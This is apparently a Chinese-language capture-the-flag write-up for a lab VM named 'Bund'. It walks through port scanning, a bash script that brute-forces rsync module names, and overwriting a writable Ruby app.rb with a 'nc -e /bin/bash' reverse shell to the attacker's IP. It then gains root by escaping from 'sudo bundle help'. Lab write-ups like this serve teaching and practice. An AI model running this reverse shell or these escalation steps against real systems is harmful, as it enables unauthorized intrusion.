# 靶场搭建
下载:Bund
Nat,IP: 192.168.1.163
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Site doesn't have a title (text/html). | |
|_http-server-header: Apache/2.4.56 (Debian) | |
873/tcp open rsync (protocol version 31) | |
9393/tcp open http WEBrick httpd 1.8.1 (Ruby 2.7.4 (2021-07-07)) | |
|_http-title: Site doesn't have a title (text/html;charset=utf-8). | |
|_http-server-header: WEBrick/1.8.1 (Ruby/2.7.4/2021-07-07) |
RSYNC
是一个常用的开源工具,用于在不同系统之间同步文件和目录。它通过比较源和目标文件的元数据(如文件大小和修改日期)来确定需要更新的文件,然后仅传输发生更改的部分,这样可以节省带宽并加快文件同步的速度。RSYNC
通常在命令行中使用,并具有许多可配置的选项,使其非常灵活和强大。
需要找到路径,编写一个 bash 脚本:
#!/bin/bash | |
directory="directory.txt" | |
IP="192.168.1.163" | |
if [ ! -f $directory ]; then | |
echo "文件 $directory 不存在" | |
exit 1 | |
fi | |
while IFS= read -r line | |
do | |
printf "Trying:$line\n" | |
rsync $IP::$line >/dev/null 2>/dev/null | |
[[ $? == '0' ]] && echo -e "\n[*]Exist: $line" && rsync $IP::$line &&exit | |
done < $directory |
给个字典,找到了 fileadmin
这个路径,看一下
┌──(root㉿kali)-[~] | |
└─# rsync -av --list-only rsync://192.168.1.163/fileadmin | |
receiving incremental file list | |
drwxrwxrwx 4,096 2023/05/27 10:40:29 . | |
-rwxrwxrwx 14 2023/05/27 06:00:12 Gemfile | |
-rwxrwxrwx 370 2023/05/27 06:01:38 Gemfile.lock | |
-rwxrwxrwx 75 2023/05/27 10:30:25 app.rb | |
sent 20 bytes received 110 bytes 260.00 bytes/sec | |
total size is 459 speedup is 3.53 |
下载下来 app.rb,搞成反弹 shell 传回去访问
┌──(root㉿kali)-[~/bund] | |
└─# rsync 192.168.1.163::fileadmin/app.rb . |
require 'sinatra' | |
require 'shotgun' | |
get '/' do | |
`nc -e /bin/bash 192.168.1.129 4444` | |
end |
┌──(root㉿kali)-[~/bund] | |
└─# rsync app.rb 192.168.1.163::fileadmin |
监听,访问: http://192.168.1.163:9393
拿到 shell
# 提权
sudo -l
发现 `bundle
直接 sudo bundle help
后 !/biin/bash
拿到 root 权限